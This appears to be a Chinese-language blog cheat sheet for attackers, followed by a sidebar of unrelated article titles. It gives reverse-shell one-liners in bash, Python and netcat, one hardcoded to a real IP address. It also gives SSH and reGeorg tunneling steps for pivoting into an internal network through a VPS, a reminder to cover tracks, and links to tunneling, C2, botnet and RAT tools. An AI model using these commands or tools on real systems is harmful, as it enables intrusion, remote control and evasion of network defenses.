bash -i >& /dev/tcp/ip/3333 0>&1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('149.28.133.203',333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
nc -e /bin/sh ip 3333
python -c 'import pty; pty.spawn("/bin/bash")' https://www.freebuf.com/news/142195.html reGeorgSocksProxy.py -p 9999 -u 木马 ssh -f -N -D ip:7070 xss@172.30.0.2 ssh -CfNg -D 7001 root@172.30.0.2 -p 22
A是vps主机,B,C 是内网
B: ssh -p 22 -qngfNTR "*:7777:localhost:22" root@A的vps
A主机的sshd配置文件/etc/ssh/sshd_config添加:GatewayPorts yes 在C主机上面运行:
C: ssh -p 7777 -qngfNTD 8888 root@A的vps
然后输入B主机的ssh密码,此时就可以以C主机的8888端口作为socks5代理来进入B的内网 不想输入密码可以用私钥,注意擦屁股。 http://www.ttlsa.com/linux/linux-setup-socks-5-ttlsa/ https://github.com/vzex/dog-tunnel 狗洞
https://github.com/SECFORCE/Tunna Tunna是一组将包裹和隧道通过HTTP任何TCP通信工具。它可用于绕过在充分防火墙环境中的网络的限制。
https://github.com/ahhh/Reverse_DNS_Shell 使用DNS作为C2通道蟒蛇反向壳
https://github.com/subTee/PoshRat PowerShell的反向HTTPs的壳
https://github.com/inquisb/icmpsh 简单的反向ICMP外壳
https://github.com/ring04h/rtcp2udp 反向TCP端口UDP转发工具
https://github.com/gentry0520/udptunnel 稳定的UDP反向端口映射方法
https://github.com/RicterZ/reprocks 一个Python socks5代理服务器/客户端
https://github.com/T3rry7f/tulua HTTP隧道的TCP连接
https://github.com/sweetsoftware/Ares Python的僵尸网络以及后门 战神是一个Python远程访问工具。
https://github.com/sailro/Bdtunnel BoutDuTunnel能够创建在HTTP请求隧道虚拟连接。
https://github.com/n1nj4sec/pupy Pupy是一个开源,跨平台(Windows,Linux和OSX,Android版),多功能RAT(远程管理工具
https://github.com/funkandwagnalls/ranger一个工具,支持安全专家的访问和远程基于Microsoft Windows的系统进行交互

  

最新文章

  1. 慎用mutableCopy
  2. Android之ImageView 旋转
  3. 设置drawable图片
  4. ecshop以幻灯版调用首页主广告显示
  5. discuznt学习笔记
  6. (转)window.location.search的用法
  7. Qt中将QTableView中的数据导出为Excel文件
  8. 2017 年不可错过的开发工具 Top 50
  9. Linux下nc命令的使用
  10. Linux三种网络连接模式
  11. h5属性直接控制上传文件类型
  12. 【XSY1642】Another Boring Problem 树上莫队
  13. c++注意易错点
  14. ui设计用什么软件
  15. 安装pyenv virtualenv
  16. 课程一(Neural Networks and Deep Learning),第一周(Introduction to Deep Learning)—— 1、经常提及的问题
  17. Spring Boot安装
  18. 从Objective-C到Swift,你必须会的(二)组合options
  19. JavaScript权威指南第03章 类型、值和变量(1)
  20. struts2框架实例

热门文章

  1. 【springcloud】模拟RPC调用(Feign)
  2. spring的异常处理
  3. 【gdal】创建GeoTiff栅格数据
  4. LeetCoded第20题题解--有效的括号
  5. freecodecamp挑战
  6. Int 2e 与 Sysenter区别
  7. freeswitch简介
  8. redis集群访问,重启,关闭,带密码访问集群
  9. 云原生学习筑基 ~ 组网必备知识点 ~ DNS服务
  10. 洛谷P2115 Sabotage G 题解